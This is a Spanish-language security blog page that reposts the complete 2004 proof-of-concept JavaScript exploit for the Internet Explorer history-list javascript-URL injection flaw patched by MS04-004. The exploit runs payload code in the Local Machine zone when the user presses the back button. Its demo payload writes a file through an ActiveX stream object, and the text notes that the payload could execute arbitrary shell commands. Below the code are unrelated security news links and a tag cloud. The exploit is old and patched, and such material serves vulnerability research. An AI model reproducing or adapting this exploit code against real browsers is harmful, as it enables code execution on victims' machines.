Internet Explorer url javascript injection in history list (MS04-004)


Andreas Sandblad, 2004-02-03, patched by MS04-004
Purpose: Run payload code called from Local Machine zone.
The code may be arbitrary such as executing shell commands.

This demo simply creates a harmless textfile on the desktop.





function payload() {
file = \"sandblad.txt\";
o = new ActiveXObject(\"ADODB.Stream\");
o.Open();
o.Type=2;
o.Charset=\"ascii\";
o.WriteText(\"You are vulnerable!\");
o.SaveToFile(file, 2);
o.Close();
alert(\"File \"+file+\" created on desktop!\");
}
// Name: trigger
// Purpose: Inject javascript url in history list and run payload
// function when the user hits the backbutton.
function trigger(len) {
if (history.length != len)
payload();
else
return \"-onload=external.NavigateAndFind(\'res:\',\'\',\'\')>\";
}
// Name: backbutton
// Purpose: Run backbutton exploit.
function backbutton() {
location = \'javascript:\'+trigger+payload+\'trigger(\'+history.length+\')\';
}
// Launch backbutton exploit on load
if (confirm(\"Press OK to run backbutton exploit!\"))
backbutton();


Otras noticias de interés:

OOXML es un callejón sin salida, Microsoft volverá a ODF
Es el pronóstico de Bob Sutor, vicepresidente de la división de código abierto y estándares de IBM, que está convencido que el formato de documentos recientemente aprobado, Open Office XML, es un callejón sin salida para la industria, lo que ob...
Dvorak: "Internet Explorer ha sido el peor error de Microsoft"
El observador de PC Magazine, John Dvorak, no duda en calificar el navegador Internet Explorer como el mayor, y más costoso, error cometido por Microsoft en su historia. Más aún, Dvorak no entiende cómo es posible que Microsoft continúe perdiend...
La respuesta automática fuera de la oficina de los correos, es utilizada para envío de spam
McAfee dice haber detectado una nueva técnica para el envío de correo basura que, aunque a la larga sea sencilla de atajar y se convierta en una mera anécdota, no deja de ser curiosa. ...
Linux vulnerable a código malicioso en archivos PDF
Un agujero de seguridad en conocidos lectores hecho público recientemente, puede permitir a un atacante utilizar archivos PDF (Adobe Systems) y PostScripts para ejecutar código malicioso en máquinas bajo Linux y Unix....
Vulnerabilidades en varios lectores PDF para Unix
El CERT/CC informa de una vulnerabilidad detectada en varios visores y lectores de documentos en formato PDF para entornos Unix. Las implicaciones en materia de seguridad son graves, ya que un atacante podría ejecutar comandos d...
Hackean a expertos de seguridad en la víspera de Black Hat
En la víspera de la conferencia de seguridad Black Hat, hackers maliciosos hicieron público un archivo con 29.000 líneas de código que detalla ataques que han tomado el control de servidores y sitios web mantenidos por investigadores de seguridad...
Variante de Bagle y tiempos de reacción antivirus
Pasadas las primeras horas de propagación de la nueva variante de Bagle, donde el número de incidencias fue muy significativo, los últimos indicadores muestran un descenso considerable de su actividad, alejando las posibilidades de epidemia. En...
Ataques a #Java lideran el top de vulnerabilidades de 2011
Varios exploits basados en Java y otros relacionados con HTML/JS y documentos con extensión PDF ocupan las primeras posiciones en un ranking de amenazas de 2011 elaborado por Virus Bulletin ...
Nuevo virus Appix.B, muy peligroso
Acaba de informar acerca de un nuevo gusano de correo electrónico denominado Appix.B (W32/Appix.B). Como principal característica, destaca su capacidad para autoejecutarse simplemente con la vista previa del mensaje en el que llega incluido. ...
BitDefender lanza nueva herramienta gratuita
Esta herramienta puede eliminar el virus informático Carberp, un peligroso troyano bancario. Revise y limpie su pc del peligroso virus Carberp (peligroso troyano bancario), eliminandolo con la novedosa herramienta gratuita BitDefender ...

Brindanos
un o una


Redes Sociales

Publicidad


Gana Bitcoins desde tu casa

Categorías


Planeta Vaslibre

Blog Roll




Nube de tags

  • anonimato
  • anonimo
  • antivirus
  • apache
  • blog
  • bsd
  • bug
  • centos
  • chrome
  • cifrado
  • computer
  • debian
  • exploits
  • explorer
  • fedora
  • fice
  • firefox
  • forense
  • freebsd
  • gentoo
  • github
  • gnome
  • gnu
  • gpl
  • gtk
  • hack
  • hacking
  • history
  • hosting
  • informatica
  • injection
  • internet
  • isos
  • javascript
  • libre
  • licencias
  • linux
  • linuxmint
  • list
  • lxde
  • micros
  • mint
  • mit
  • mozilla
  • mysql
  • noticia
  • opensource
  • pgp
  • php
  • sabayon
  • seguridad
  • system
  • tecnologia
  • thunar
  • thunderbird
  • tor
  • troyanos
  • tware
  • ubuntu
  • underground
  • url
  • vaslibre
  • virus
  • viserproject
  • vivaldi
  • vulnerabilidades
  • web
  • website
  • windows
  • xanadu
  • xfce
  • xombra